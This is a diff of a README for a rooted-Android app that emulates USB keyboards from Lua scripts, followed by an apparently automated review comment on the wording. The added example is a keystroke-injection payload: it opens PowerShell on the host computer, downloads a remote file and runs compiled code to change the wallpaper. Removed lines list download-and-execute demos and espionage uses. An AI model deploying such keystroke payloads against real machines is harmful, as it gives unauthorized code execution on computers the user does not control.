|
1 | | -# Android HID Script |
| 1 | +# Android USB Script |
2 | 2 |
|
3 | 3 | **Use at your own risk. For educational purposes only.** |
4 | 4 |
|
5 | | -An Android app that provides a simple Lua interface for emulating an HID device, on top of the existing `android-keyboard-gadget` patch by `pelya`. **Root access is required.** |
| 5 | +An Android app that provides a simple Lua interface for enumerating and interfacing |
| 6 | +with arbitrary composite USB devices. |
6 | 7 |
|
7 | | -## Requirements |
8 | | -**This app will not work on every Android device.** If your Android OS has Linux Kernel version >= 3.18 and is compiled with configfs and f_hid, then the app can try to create usb gadgets for mouse and keyboard. |
| 8 | +**Root access is required.** |
9 | 9 |
|
10 | | -If your Android OS is compiled with the [android-keyboard-gadget kernel patch](https://github.com/pelya/android-keyboard-gadget), then the app can use the usb gadgets it provides. |
| 10 | +The best way to explain what this app does is with a code example. The following script |
| 11 | +does the following when interpreted by this app: |
11 | 12 |
|
12 | | -## HID Emulation? |
13 | | -``` |
14 | | -In computing, the USB human interface device class (USB HID class) is a part of the USB |
15 | | -specification for computer peripherals: it specifies a device class (a type of computer |
16 | | -hardware) for human interface devices such as keyboards, mice, game controllers and |
17 | | -alphanumeric display devices. |
18 | | - - Wikipedia |
19 | | -``` |
20 | | -This app provides an easy way to script HID interactions intuitively, with feedback. In addition, it contains wrappers around the HID devices allowing developers to easily integrate HID functionality into their own apps. |
| 13 | +1. Configures your phone to become a USB keyboard |
| 14 | +2. Sends a series of key presses to the computer your phone is plugged in to, changing |
| 15 | +its wallpaper |
| 16 | + |
| 17 | +```lua |
| 18 | +-- create a USB composite device composed of a single keyboard |
| 19 | +usb = luausb.create({ id = 0, type = "keyboard" }) |
| 20 | +kb = usb.dev[1] |
| 21 | + |
| 22 | +local file = "https://i.redd.it/ur1mqcbpxou51.png" |
21 | 23 |
|
22 | | -On the news recently, use and abuse of the trust given to HID devices was demonstrated with the [BadUSB](https://www.wired.com/2014/07/usb-security/) attack, where USB devices were abused to utilize HID protocol to carry out nefarious actions. |
| 24 | +while true do |
| 25 | + -- wait for the phone to be plugged into a computer |
| 26 | + while not kb.test() do usb.delay(1000) end |
23 | 27 |
|
24 | | -## Use Cases of Scripted HID Emulation |
25 | | -- Automation of deployment solutions (ie. configuring computer BIOs settings in an automated fashion) |
26 | | -- Mobile password managers that type in your credentials for you, on computers you do not trust |
27 | | -- Use in computer espionage or social engineering attacks |
| 28 | + usb.delay(1000) |
28 | 29 |
|
29 | | -## Features |
30 | | -A couple of demo applications are implemented: |
31 | | -- Fuzzing of HID protocol |
32 | | -- PowerShell download and run executable |
33 | | -- PowerShell download and run PowerShell script |
34 | | -- Serial transfer of data through output reports |
35 | | -- Change wallpaper ([video demonstration](https://my.mixtape.moe/zxerjz.mp4)) |
| 30 | + kb.press_keys(kb.LSUPER, kb.R) -- open the Windows run dialog |
| 31 | + usb.delay(2000) -- wait 2 seconds |
| 32 | + kb.send_string("powershell\n") -- pop open a powershell window |
| 33 | + usb.delay(2000) |
36 | 34 |
|
37 | | -New demo applications can be added to `assets/scripts`. The API is pretty much self-documenting, just look at the existing demos to get a feel for how the API works. |
| 35 | + -- enter a script that changes your wallpaper |
| 36 | + kb.send_string("[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;" .. |
| 37 | + "(new-object System.Net.WebClient).DownloadFile('" .. file .. "',\"$Env:Temp\\b.jpg\");\n" .. |
| 38 | + "Add-Type @\"\n" .. |
| 39 | + "using System;using System.Runtime.InteropServices;using Microsoft.Win32;namespa" .. |
| 40 | + "ce W{public class S{ [DllImport(\"user32.dll\")]static extern int SystemParamet" .. |
| 41 | + "ersInfo(int a,int b,string c,int d);public static void SW(string a){SystemParam" .. |
| 42 | + "etersInfo(20,0,a,3);RegistryKey c=Registry.CurrentUser.OpenSubKey(\"Control Pan" .. |
| 43 | + "el\\\\Desktop\",true);c.SetValue(@\"WallpaperStyle\", \"2\");c.SetValue(@\"Tile" .. |
| 44 | + "Wallpaper\", \"0\");c.Close();}}}\n" .. |
| 45 | + "\"@\n" .. |
| 46 | + "[W.S]::SW(\"$Env:Temp\\b.jpg\")\n" .. |
| 47 | + "exit\n") |
| 48 | + |
| 49 | + -- wait for the phone to be unplugged |
| 50 | + while kb.test() do usb.delay(1000) end |
| 51 | +end |
| 52 | +``` |
| 53 | + |
| 54 | +## Requirements |
| 55 | +**This app will not work on every Android device.** If your Android OS has Linux Kernel |
| 56 | +version >= 3.18 and is compiled with configfs and f_hid, then the app can try to create usb |
| 57 | +gadgets. |
38 | 58 |
|
39 | | -For people who want to implement HID functionality in their own apps, HID interfacing code available [here (HID.java)](https://github.com/Netdex/android-hid-script/blob/master/app/src/main/java/cf/netdex/hidfuzzer/hid/HID.java), |
40 | | -and a simple ease-of-use wrapper is available [here (HIDR.java)](https://github.com/Netdex/android-hid-script/blob/master/app/src/main/java/cf/netdex/hidfuzzer/hid/HIDR.java). The documentation should be enough to understand how it works. |
| 59 | +New demo applications can be added to `assets/scripts`. The API is pretty much self-documenting, |
| 60 | +just look at the existing demos to get a feel for how the API works. |
41 | 61 |
|
42 | 62 | ## Third-party |
43 | | -- Requires ChainFire's [libsuperuser](https://github.com/Chainfire/libsuperuser) to keep a su shell open. |
44 | | -- Requires LuaJ to provide Lua binding and interpret Lua scripts. |
| 63 | +- [libsuperuser](https://github.com/Chainfire/libsuperuser) |
| 64 | +- [LuaJ](http://www.luaj.org/luaj/3.0/README.html) |
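Review bot: The new intro (new lines 5-6) promises "arbitrary composite USB devices", but the rewritten Requirements paragraph (new lines 55-57) still names only configfs and f_hid, and the example passes only `type = "keyboard"`. Either list the `type` values that `luausb.create` accepts or narrow the intro to what f_hid covers. The removed sentence about kernels built with the android-keyboard-gadget patch has no replacement, so state explicitly whether those kernels are still supported. In the example, the two-step summary (new lines 13-15) omits that the outer `while true` loop repeats the keystrokes on every reconnect, and the download is saved as `b.jpg` although the URL ends in `.png`. The Third-party list also drops the notes on why each dependency is needed (the su shell, the Lua interpreter), which are worth keeping in a README for an app that requires root.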